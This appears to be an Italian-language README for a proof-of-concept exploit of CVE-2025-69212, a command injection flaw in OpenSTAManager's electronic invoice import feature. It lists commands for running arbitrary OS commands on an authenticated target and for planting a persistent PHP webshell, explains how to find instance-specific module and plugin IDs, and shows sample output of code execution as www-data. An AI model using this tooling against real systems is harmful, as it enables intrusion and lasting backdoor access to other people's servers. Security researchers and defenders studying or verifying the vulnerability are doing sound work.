
CVE-2025-69212 - OpenSTAManager PoC di iniezione di comandi del sistema operativo
Installa le dipendenze:
pip install -r requirements.txt
Esegui un singolo comando e stampa il suo output:
python3 cve-2025-69212_poc.py -u http://target.com -U admin -P 'password' -c 'id'
Rilascia una webshell PHP persistente:
python3 cve-2025-69212_poc.py -u http://target.com -U admin -P 'password' --shell
| Flag | Descrizione |
|---|---|
-u, --url | URL di base dell'istanza target |
-U, --username | Nome utente per l'autenticazione |
-P, --password | Password per l'autenticazione |
-c, --command | Comando da eseguire, output salvato in pwn_out.txt |
--shell | Rilascia una webshell PHP in files/shell.php invece di eseguire un singolo comando |
--id-module | ID del modulo per la funzione di importazione fatture (predefinito: 14) |
--id-plugin | ID del plugin per la funzione di importazione fatture (predefinito: 48) |
id_module e id_plugin sono specifici dell'istanza. Se i valori predefiniti non funzionano, accedi all'interfaccia web del target, vai alla funzione di importazione delle fatture elettroniche e controlla i parametri della richiesta nella scheda Rete del tuo browser.
$ python3 cve-2025-69212_poc.py -u http://target.com -U admin -P 'password' -c 'id'
[*] Logging in as admin ...
[+] Authenticated.
[*] Building payload to run: id
[*] Uploading exploit ZIP to id_module=14 id_plugin=48 ...
[*] Server responded: HTTP 500 (500 after command execution is expected)
[*] Fetching command output from http://target.com/files/pwn_out.txt ...
[+] Command output:
--------------------------------------------------
uid=33(www-data) gid=33(www-data) groups=33(www-data)
--------------------------------------------------